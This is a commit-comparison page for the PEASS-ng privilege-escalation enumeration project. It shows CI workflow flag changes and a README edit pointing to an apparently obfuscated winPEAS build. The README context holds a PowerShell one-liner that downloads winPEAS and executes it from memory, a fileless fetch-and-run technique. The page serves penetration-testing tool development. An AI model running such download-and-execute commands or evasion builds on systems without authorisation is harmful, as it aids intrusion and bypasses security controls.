Compare commits

...

4 Commits

Author SHA1 Message Date
Carlos Polop
87857f9a7b Merge 07a2db8553 into 21d3b3f349 2021-12-31 10:50:52 +00:00
Carlos Polop
21d3b3f349 Update README.md 2021-12-30 10:23:11 +00:00
Carlos Polop
aa94d9d432 Merge pull request #252 from carlospolop/linpeas_dev
trigger action
2021-12-30 09:32:35 +00:00
Carlos Polop
5b8f3968e8 Update CI-master_tests.yml 2021-12-30 01:02:53 +00:00
2 changed files with 3 additions and 3 deletions

View File

@@ -196,7 +196,7 @@ jobs:
# Run linpeas as a test # Run linpeas as a test
- name: Run linpeas - name: Run linpeas
run: linPEAS/linpeas.sh -a -d run: linPEAS/linpeas.sh -a -D
# Upload files for release # Upload files for release
- name: Upload linpeas.sh - name: Upload linpeas.sh
@@ -283,7 +283,7 @@ jobs:
# Run macpeas parts to test it # Run macpeas parts to test it
- name: Run macpeas - name: Run macpeas
run: linPEAS/linpeas.sh -d -o system_information,container,procs_crons_timers_srvcs_sockets,network_information,users_information,software_information run: linPEAS/linpeas.sh -D -o system_information,container,procs_crons_timers_srvcs_sockets,network_information,users_information,software_information
Publish_release: Publish_release:

View File

@@ -20,7 +20,7 @@ Precompiled binaries:
$latestRelease = Invoke-WebRequest https://github.com/carlospolop/PEASS-ng/releases/latest -Headers @{"Accept"="application/json"} $latestRelease = Invoke-WebRequest https://github.com/carlospolop/PEASS-ng/releases/latest -Headers @{"Accept"="application/json"}
$json = $latestRelease.Content | ConvertFrom-Json $json = $latestRelease.Content | ConvertFrom-Json
$latestVersion = $json.tag_name $latestVersion = $json.tag_name
$url = "https://github.com/carlospolop/PEASS-ng/releases/download/$latestVersion/winPEASany.exe" $url = "https://github.com/carlospolop/PEASS-ng/releases/download/$latestVersion/winPEASany_ofs.exe"
# One liner to download and execute winPEASany from memory in a PS shell # One liner to download and execute winPEASany from memory in a PS shell
$wp=[System.Reflection.Assembly]::Load([byte[]](Invoke-WebRequest "$url" -UseBasicParsing | Select-Object -ExpandProperty Content)); [winPEAS.Program]::Main("") $wp=[System.Reflection.Assembly]::Load([byte[]](Invoke-WebRequest "$url" -UseBasicParsing | Select-Object -ExpandProperty Content)); [winPEAS.Program]::Main("")